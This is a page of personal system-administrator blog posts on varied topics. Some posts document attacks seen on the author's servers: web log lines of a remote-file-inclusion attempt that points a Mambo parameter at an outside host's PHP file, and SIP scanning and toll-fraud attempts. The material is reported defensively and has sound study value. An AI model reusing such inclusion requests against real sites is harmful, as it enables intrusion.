News items for tag english - Koos van den Hout

One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.

Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like

The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance.

and

Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, its climate controlled and is capable of withstanding a nuclear hit.

The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.

It's also easy to reach:

it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessable by road too).

Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting

I made a lolcat: How many times do I need to ask to put the seat down!

Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec                Device I/O:       19
 Overhead CPU:    0.016 sec                Paging I/O:      143
 CPU model:         2-CPU 2.5GHz Xeon L5420 6M (2048M)

I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.

Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.

Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.

Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.

It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.

Writing about security on your website has this interesting effect in the logs:

200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"

The content of heheh.txt is predictable:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.

Yes, took the step. The homepage lives at http://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.

A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:

Most servers use the ~ symbol to represent the personal directories of individuals.
If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line.

Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling, this change was to me reason for a bump in the minor version number of the homepage.

First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.

I just noticed something: the archive of webcam.idefix.net in the Uithof in Utrecht now covers a longer period (now 3 years and approximately 3 months) than the archive of webcam.idefix.net at the Beneluxlaan in Utrecht (which stopped just a bit over 2 years). How time flies.

Lots of phishing attempts for webmail accounts flying by, at the moment it seems popular to use webform hosters to ask for account credentials. I seem to miss a part of these. Probably my spamfilters being too good or something. But at work there are some people who know I am interested in new and recurring strains of Internet abuse so I still get interesting stuff forwarded to investigate. The latest catch advertised a dot.tk domain which inlined a webform from a tripod hosted site which was a copy of an emailmeform.com form and used emailmeform.com to process it and redirected to a generic thankyou form by a new zealand printer supplies company. It takes a bit of tracing and trying to solve such a puzzle and notify all parties about their role in the abuse.

By now a lot of people in the world are aware of the case of a US, Pennsylvania school was accused of using webcams in school-issued laptops to spy on students at home without their consent (via Slashdot). A lot of theories and weird stories are going around but I found a good technical explanation: The Spy at Harrington High - Stryde Hax who as a bystander and with his technical background has done a thorough analysis of the techniques used and the stance of the people involved in this matter. Good reading material for those who are actually interested in what was really happening.
The original story seems to be turning into this 'Only in America' story: School spying scandal gets even more bizarre - Slashdot:

The student in question that was disciplined for an "improper act" was apparently accused of either drug use or drug selling. Turns out he was eating Mike & Ike candy, not popping pills.

If you want to detect LANRev Agent on a system, Network Fingerprint for LANRev Agent - Stryde Hax has the answer.

SIP scanning is active again. Sandro Gauci came with a link to And the scanning just keeps on coming I checked the logs on 2 asterisk servers for recent break-in attempts and presto... from different IPs, but the pattern I saw before in trying to find insecure SIP servers:

[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"3776548202"<sip:3776548202@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found


[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"952"<sip:952@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"953"<sip:953@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"954"<sip:954@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found

No damage and no costs. The other server shows attempts to use the sip guest environment again:

[Feb 13 05:27:08] NOTICE[5710] chan_sip.c: Call from '' to extension '90442075821233' rejected because extension not found.
[Feb 13 05:27:27] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:27:38] NOTICE[5710] chan_sip.c: Call from '' to extension '0442076311117' rejected because extension not found.
[Feb 13 05:27:40] NOTICE[5710] chan_sip.c: Call from '' to extension '0011447850019298' rejected because extension not found.
[Feb 13 05:27:42] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:27:44] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
[Feb 13 05:27:56] NOTICE[5710] chan_sip.c: Call from '' to extension '0000447956581268' rejected because extension not found.
[Feb 13 05:27:57] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '900442075964032' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '9011441252625280' rejected because extension not found.
[Feb 13 05:28:09] NOTICE[5710] chan_sip.c: Call from '' to extension '1442074370973' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '00000447889904142' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.

This time with somewhat random looking phone numbers in the UK which aren't well-known to google.

Todays xkcd is very amusing! As a system administrator I can imagine the need for making sure important infrastructure like the blog of a cat.

Friday, time for the Friday Afternoon URL page which you can also follow on twitter as @fridayaftURL to get fresh Friday Afternoon URLs in your twitter feed!

No license to rdesktop for me: I recently got a really weird error from rdesktop:

koos@leek:~$ rdesktop -M -g 1200x900 -d something terminalserver
Autoselected keyboard map en-us
disconnect: No valid license available.

Some searching found me: License to rdesktop. Indeed, setting a different hostname from my own hostname helps:

koos@leek:~$ rdesktop -M -g 1200x900 -d something -n leeks terminalserver
Autoselected keyboard map en-us
/users/koos/.rdesktop/licence.leeks.new: Permission denied
WARNING: Remote desktop does not support colour depth 24; falling back to 16

The license file error has to do with another workaround. But maybe the running out of licenses for 'leek' is because I never give licenses back. Why is all this software very busy with making sure money is made for its maker and not busy with helping the user.

The EFF has written an article Music Journalism is the New Piracy. The music industry seems to have the intention of thoroughly destroying itself, and that destruction will be celebrated by music fans worldwide. Found via Is There Any Way To Be A Music Blogger Without Risking Takedown? at Techdirt.
Or as Boingboing put it: Music industry to musicbloggers: there's no point in obeying the law.